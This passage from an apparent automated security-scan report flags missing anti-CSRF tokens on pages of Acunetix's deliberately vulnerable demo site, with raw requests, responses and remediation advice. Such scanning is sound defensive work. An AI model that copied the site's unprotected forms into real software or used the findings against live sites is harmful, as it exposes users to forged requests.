          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        10. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        11. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a 